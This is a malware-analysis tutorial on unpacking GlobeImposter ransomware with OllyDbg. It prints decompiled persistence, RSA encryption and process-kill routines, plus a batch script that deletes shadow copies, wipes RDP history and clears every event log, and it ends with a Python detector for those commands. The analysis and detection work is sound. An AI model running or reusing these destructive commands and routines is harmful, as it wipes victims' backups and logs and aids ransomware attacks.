Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
Tools: OllyDbg, CFF Explorer, IDA Pro
Credit: @dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

Background
GlobeImposter ransomware uses a loader/patcher routine that patches and loads the decoded payload in memory.

Theory
GlobeImposter ransomware patches itself by calling CreateProcessA with the creation flag set to CREATE_SUSPENDED and then writing itself into the new process's buffer via WriteProcessMemory. The suspended process is not executed immediately; it does not start until ResumeThread is called, so the loader has time to patch the image in memory.

Practice:
I. Load OllyDbg and click "File" ->
II. Click "Go to" -> "Expression" -> type "WriteProcessMemory" and set a breakpoint on it with F2.
III. Run the process with F9; when the breakpoint hits, follow the buffer argument in the dump window to observe the unpacked GlobeImposter image.
IV. Then click "Backup" -> "Save data to file."
V. Verify the exported payload and its IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(a) Registry persistence:

HKEY\Software\Microsoft\Windows\CurrentVersion\RunOnce\CertificatesCheck
(b) GlobeImposter vssadmin & host script:
  // Builds "<TEMP>\__t<hex>.TMP" (GetTempFileNameW uses only the first three prefix characters) and appends ".bat"
  GetTempFileNameW(&PathName, L"__tmp", 0, &TempFileName);
  lstrcatW(&TempFileName, L".bat");
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);   // GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
  v1 = result;
  if ( result != (HANDLE)-1 )
  {
    // Batch script: deletes all Volume Shadow Copies, wipes the RDP connection history and Default.rdp,
    // then clears every Windows event log returned by "wevtutil el"
    v2 = lstrlenA("@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"");
    WriteFile(
      v1,
      "@echo off\r\n"
      "vssadmin.exe Delete Shadows /All /Quiet\r\n"
      "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\n"
      "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\n"
      "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\n"
      "cd %userprofile%\\documents\\\r\n"
      "attrib Default.rdp -s -h\r\n"
      "del Default.rdp \r\n"
      "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"",
      v2,
      &NumberOfBytesWritten,
      0);
    CloseHandle(v1);
    result = (HANDLE)sub_4126D7(&TempFileName);   // receives the .bat path; presumably launches it
(c) RSA public encryption key function value:
 // 512 hex digits = 256-byte (2048-bit) RSA modulus; the public exponent 010001 (65537) is hard-coded in the routine below
 v18 = RSA_Encrypt_Function(
          "A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A"
          "3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843"
          "EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C"
          "A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E"
          "EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23",
          v15,
          0xC0u);

....
  v3 = lpString;                                         // hex modulus string passed in by the caller
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  sub_40FBC8(&v11);
  sub_40FDEC(&v9);
  v5 = lstrlenA("rsa_encrypt");
  // modulus (v14) parsed from the hex string, public exponent (v15) hard-coded as 010001; 0 = success for each call
  if ( !sub_40FB4F((int)&v11, (int)&v9, "rsa_encrypt", v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, "010001") )
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;     // modulus length in bytes: (bits + 7) / 8
    memmove(&v8, a2, a3);                                // copy the a3-byte input into the work buffer
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )      // encrypt v8 -> v10; non-zero return = error
      memset(&v10, 0, a3);                               // on error, zero the output buffer
(d) Taskkill function terminating processes whose image name contains one of the following strings:
  • "sql"
  • "outlook"
  • "ssms"
  • "postgre"
  • "1c"
  • "excel"
  • "word"
  memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;                                      // sizeof(STARTUPINFOA)
  result = CreateToolhelp32Snapshot(2u, 0);                 // TH32CS_SNAPPROCESS
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    pe.dwSize = 556;                                        // sizeof(PROCESSENTRY32W)
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;                            // table of the 7 target substrings listed above
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);                   // likely wide-to-ANSI copy of szExeFile
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )                   // per-character transform before matching (decompiler output)
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )                             // substring match against the current target
          break;
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )    // end of table: 0x1C bytes = 7 pointers
          goto LABEL_10;
      }
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, "%d", pe.th32ProcessID);
      lstrcpyA(&String1, "taskkill /F /T /PID ");
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);   // CREATE_NO_WINDOW
LABEL_10:
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
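As a defender-side counterpart to the batch script in (b) and the kill loop in (d), here is an added example (not code from the original post) of detection logic run over constructed process-creation events. It matches the command lines those two routines produce and flags a parent that spawns several forced taskkill children. The `__t<hex>.TMP.bat` name pattern follows from GetTempFileNameW using only the first three prefix characters plus a hex counter and ".TMP", to which the sample appends ".bat". The event fields (pid, ppid, cmdline) are an assumed schema, not any particular sensor's.

```python
import re
from collections import Counter

# Command-line patterns taken from the decompiled batch script (b) and kill loop (d) above.
RULES = {
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\s+/all", re.I),
    "event_log_clearing":   re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I),
    "rdp_history_wipe":     re.compile(r"reg\s+delete\s+.*Terminal Server Client", re.I),
    "temp_bat_launch":      re.compile(r"\\__t[0-9A-F]+\.TMP\.bat\b", re.I),
    "forced_pid_kill":      re.compile(r"taskkill\s+/F\s+/T\s+/PID\s+\d+", re.I),
}
KILL_CHAIN_MIN = 3   # forced kills from one parent before it is reported as a kill loop

def scan_process_events(events):
    """events: iterable of dicts with pid, ppid, cmdline. Returns sorted (pid, rule) hits."""
    hits = []
    kills_per_parent = Counter()
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.append((ev["pid"], name))
                if name == "forced_pid_kill":
                    kills_per_parent[ev["ppid"]] += 1
    # Correlate: the ransomware process itself is the parent of every taskkill child
    for ppid, n in kills_per_parent.items():
        if n >= KILL_CHAIN_MIN:
            hits.append((ppid, "taskkill_loop_parent"))
    return sorted(set(hits))

# Constructed sample events modelled on behaviours (b) and (d); pid 600 stands in for the ransomware process
SAMPLE_EVENTS = [
    {"pid": 1204, "ppid": 600,  "cmdline": r'"C:\Users\u\AppData\Local\Temp\__t1A2B.TMP.bat"'},
    {"pid": 1210, "ppid": 1204, "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 1214, "ppid": 1204, "cmdline": r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'},
    {"pid": 1220, "ppid": 1204, "cmdline": 'wevtutil.exe cl "Security"'},
    {"pid": 1301, "ppid": 600,  "cmdline": "taskkill /F /T /PID 4412"},
    {"pid": 1302, "ppid": 600,  "cmdline": "taskkill /F /T /PID 4480"},
    {"pid": 1303, "ppid": 600,  "cmdline": "taskkill /F /T /PID 4512"},
    {"pid": 1400, "ppid": 777,  "cmdline": "notepad.exe README.txt"},   # benign control
]

if __name__ == "__main__":
    for pid, rule in scan_process_events(SAMPLE_EVENTS):
        print(pid, rule)
```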
(e) Targeted exclusion extensions and README extortion message in Olly:
